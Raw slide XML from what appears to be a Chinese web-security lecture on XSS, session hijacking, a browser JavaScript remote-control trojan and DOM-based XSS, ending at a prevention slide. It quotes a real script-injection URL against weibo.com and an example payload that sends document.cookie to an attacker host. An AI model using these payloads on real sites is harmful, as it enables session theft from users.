              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>其利用了微博广场页面 http://weibo.com/pub/star 的一个URL注入了js脚本，其通过http://163.fm/PxZHoxn短链接服务，将链接指向：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>注意，上面URL链接中的其实就是&lt;script src=//www.2kt.cn/images/t.js&gt;&lt;/script&gt;。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927656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="圆角矩形 6"/>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5119370" cy="500380"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l"/>
              <a:r>
                <a:rPr sz="2660" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>会话劫持（Session hijacking）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="869950"/>
            <a:ext cx="7968615" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标用户需要先登录站点；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>登录成功后，该用户会得到站点提供的一个会话标识SessionID；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者通过捕获到的Session ID访问站点即可获得目标用户合法会话。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="222885" y="1759585"/>
            <a:ext cx="5542280" cy="4505960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3646170" y="2437130"/>
            <a:ext cx="2019935" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）窃取Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5988050" y="1791970"/>
            <a:ext cx="6098540" cy="2927985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8404860" y="3678555"/>
            <a:ext cx="3611880" cy="2795905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9523095" y="2763520"/>
            <a:ext cx="2019935" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）利用Cookie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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D5BD01-BD4C-384B-4DE2-855D60AA6231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414016" y="151451"/>
            <a:ext cx="8900160" cy="6340789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3527729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927656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="圆角矩形 6"/>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2233930" cy="500380"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" sz="2660" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>浏览器</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2660" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2660" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>木马</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342390" y="1031240"/>
            <a:ext cx="1082675" cy="1092835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="782955" y="3015615"/>
            <a:ext cx="2420620" cy="1283970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="直接箭头连接符 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1884045" y="2346960"/>
            <a:ext cx="0" cy="4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5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4318635" y="917575"/>
            <a:ext cx="2415540" cy="1286510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995170" y="2368550"/>
            <a:ext cx="1208405" cy="4216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更新提示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="肘形连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3205480" y="2204085"/>
            <a:ext cx="1914525" cy="1430655"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99867"/>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834765" y="2792730"/>
            <a:ext cx="1208405" cy="4216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伪装木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2717165" y="1031240"/>
            <a:ext cx="1208405" cy="4216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安装木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="直接箭头连接符 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="3" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2425065" y="1560830"/>
            <a:ext cx="1893570" cy="171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200015" y="2294255"/>
            <a:ext cx="882650" cy="7213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Cloud9JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>远控</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="直接箭头连接符 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="26" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6146800" y="2202815"/>
            <a:ext cx="6985" cy="17335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6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4577080" y="3936365"/>
            <a:ext cx="3139440" cy="1715135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159375" y="5788660"/>
            <a:ext cx="2223770" cy="42164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远控服务端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="左大括号 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6993890" y="880110"/>
            <a:ext cx="473710" cy="2223135"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8360"/>
              <a:gd name="adj2" fmla="val 331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7382510" y="880110"/>
            <a:ext cx="4635500" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>窃取在线帐户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>ookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>记录击键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：窥探按键以窃取密码等敏感信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>监控系统剪贴板</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：是否有复制的密码或信用卡</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入广告</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：通过静默加载网页来注入广告</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>（僵尸网络）：通过对目标域的 HTTP POST 请求执行第 7 层 DDoS 攻击</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90340" y="2456815"/>
            <a:ext cx="4956810" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>型XSS攻击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7656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="274002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DOM</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型XSS攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="776605"/>
            <a:ext cx="9648825" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>通过JavaScript，可以重构整个HTML文档，就是说可以添加，移除等等，对页面的某个东西进行操作时，JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口就是DOM，所以在DOM型的xss漏洞利用中，DOM可以看成是一个访问HTML的标准程序接口。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2110740" y="2345690"/>
            <a:ext cx="8452485" cy="4440555"/>
            <a:chOff x="3324" y="3491"/>
            <a:chExt cx="13311" cy="7092"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="图片 9"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3324" y="3491"/>
              <a:ext cx="13311" cy="7092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3646" y="3491"/>
              <a:ext cx="4000" cy="735"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
                <a:t>DOM</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                <a:t>树结构</a:t>
              </a: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74002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DOM</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型XSS攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708785" y="936625"/>
            <a:ext cx="10361295" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>DOM型XSS其实是一种特殊类型的反射型XSS，它是基于DOM文档对象模型的一种漏洞。整个过程都是在前端完成的，没有后端的参与（纯前端的操作！）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708785" y="1945005"/>
            <a:ext cx="10361295" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>攻击示例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>（1）当小明登录a.com后，发现它的页面某些内容是根据url中的一个叫content参数直接显示的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body&gt;&lt;?php echo $content; ?&gt;&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>（2）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>小明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>知道了Tom也注册了该网站，并且知道了他的邮箱，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>小明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>做一个超链接发给他，超链接地址为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.a.com?content=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;window.open(“www.b.com?param=”+document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>（3）当Tom点击这个链接的时候(假设他已经登录a.com)，浏览器就会直接打开b.com，并且把Tom在a.com中的cookie信息发送到b.com，b.com是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>小明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>搭建的网站，于是就盗取了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tom在a.com的cookie信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，cookie信息中可能存有登录密码，攻击成功！</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32635" y="981710"/>
            <a:ext cx="9097645" cy="5262245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>如何防止XSS跨站脚本攻击？（原则是不相信用户输入的数据）</a:t>
            </a:r>
